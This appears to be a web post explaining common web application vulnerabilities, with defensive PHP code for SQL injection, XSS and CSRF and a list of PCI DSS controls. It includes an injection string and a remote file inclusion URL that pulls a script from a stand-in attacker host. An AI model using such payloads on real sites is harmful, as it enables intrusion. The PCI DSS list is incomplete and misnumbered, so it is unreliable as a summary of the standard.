WEB APPLICATION VULNERABILITIES IN ALL LANGUAGES: PHP, JAVA, ASP, PYTHON, PERL

Jyotishgher Astrology


Web application vulnerabilities are typically the result of a lack of input/output sanitization, which are often exploited to either manipulate source code or gain unauthorized access.
Such vulnerabilities enable the use of different attack vectors, including:
  • SQL Injection – Occurs when a perpetrator uses malicious SQL code to manipulate a backend database so it reveals information. Consequences include the unauthorized viewing of lists, deletion of tables and unauthorized administrative access.

    // Parameterised query with PDO ($dbh is an open PDO connection): the user-supplied
    // values are bound as data, so they can never change the structure of the SQL.
    $stmt = $dbh->prepare("INSERT INTO Customers (CustomerName, Address, City)
        VALUES (:nam, :add, :cit)");
    $stmt->bindParam(':nam', $txtNam);
    $stmt->bindParam(':add', $txtAdd);
    $stmt->bindParam(':cit', $txtCit);
    $stmt->execute();

    // OR: escape the value before concatenating it into the query string. This relies on
    // the legacy mysql extension, which was removed in PHP 7; mysqli_real_escape_string()
    // is the current equivalent, and prepared statements remain the preferred fix.
    $name_bad = "' OR 1'";
    $name_bad = mysql_real_escape_string($name_bad);


    • Cross-site Scripting (XSS) – XSS is an injection attack targeting users in order to access accounts, activate Trojans or modify page content. Stored XSS occurs when malicious code is injected directly into an application. Reflected XSS takes place when malicious script is reflected off of an application onto a user’s browser.

           Input Validation

             // Encode user-supplied data before writing it into HTML, so that <, >, ", ' and &
             // are shown as text instead of being parsed as markup ('data' stands for the POST field read).
             $x = htmlentities($_POST['data'], ENT_QUOTES, 'UTF-8');
             echo $x;


    • Remote File Inclusion – An attacker uses this type of attack to make a web application server include and run a file fetched from a remote host. This can result in the execution of malicious scripts or code within the application, as well as data theft or manipulation.
      http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt


    • Cross-site Request Forgery (CSRF) – An attack that could result in an unsolicited transfer of funds, changed passwords or data theft. It’s caused when a malicious web application makes a user’s browser perform an unwanted action in a site to which a user is logged on. CSRF attacks can be performed over GET or POST requests.
      Mitigation: generate a secret token for the user's session and place it in the links of the page, which would look like this: http://mysite.com/vote/30?token=AZERTYUHQNWGST
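The token scheme described above, as an added example that is not part of the original post: the function names and the $session array are my own, the page only shows the shape of the resulting link.

```php
<?php
// Added example: per-session anti-CSRF token for a state-changing link such as /vote/30.

// Create the token once per session and keep it server-side.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    }
    return $session['csrf_token'];
}

// Build the protected link the post describes: http://mysite.com/vote/30?token=...
function vote_link(array &$session, int $id): string {
    return 'http://mysite.com/vote/' . $id . '?token=' . urlencode(csrf_token($session));
}

// On the receiving side, reject the request unless the submitted token matches the
// session copy. hash_equals() compares in constant time.
function csrf_valid(array $session, ?string $submitted): bool {
    return isset($session['csrf_token'], $submitted)
        && hash_equals($session['csrf_token'], $submitted);
}

// Demonstration with a constructed array standing in for $_SESSION (in a real request
// you would call session_start() and pass $_SESSION instead).
$session = [];
$link = vote_link($session, 30);
parse_str(parse_url($link, PHP_URL_QUERY), $query);

var_dump(csrf_valid($session, $query['token']));   // bool(true):  link generated by our own page
var_dump(csrf_valid($session, 'AZERTYUHQNWGST'));  // bool(false): guessed or stale token
var_dump(csrf_valid($session, null));              // bool(false): cross-site request carries no token
```

Tokens placed in a URL can leak through the Referer header and server logs, so state-changing actions are better sent as POST forms with the token in a hidden field, validated the same way.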
    Web application security solutions and enforced security procedures, such as PCI Data Security Standard (PCI DSS) certification, should be deployed to avoid such threats.

    REQUIREMENTS:

    Area 1 – Build and Maintain a Secure Network
      • Install a firewall to protect your environment.
      • Do not use vendor default profiles or passwords.
    Area 2 – Maintain a Vulnerability Management Program
      • Use and regularly update anti-virus software.
      • Develop and maintain secure systems and applications.
    Area 4
      • Assign a unique ID to each person with computer access.
    Area 5 – Regularly Monitor and Test Networks
      • Requirement 10 – Track and monitor/log all access to network resources and cardholder data.
      • Requirement 11 – Regularly test security systems and processes.
    Area 6 – Maintain an Information Security Policy
      • Requirement 12 – Maintain a policy that addresses information security.

    ALL OF THESE CONTROLS MUST BE IMPLEMENTED IF YOU ARE LAUNCHING A WEBSITE OR NEED TO AUDIT AN EXISTING ONE.
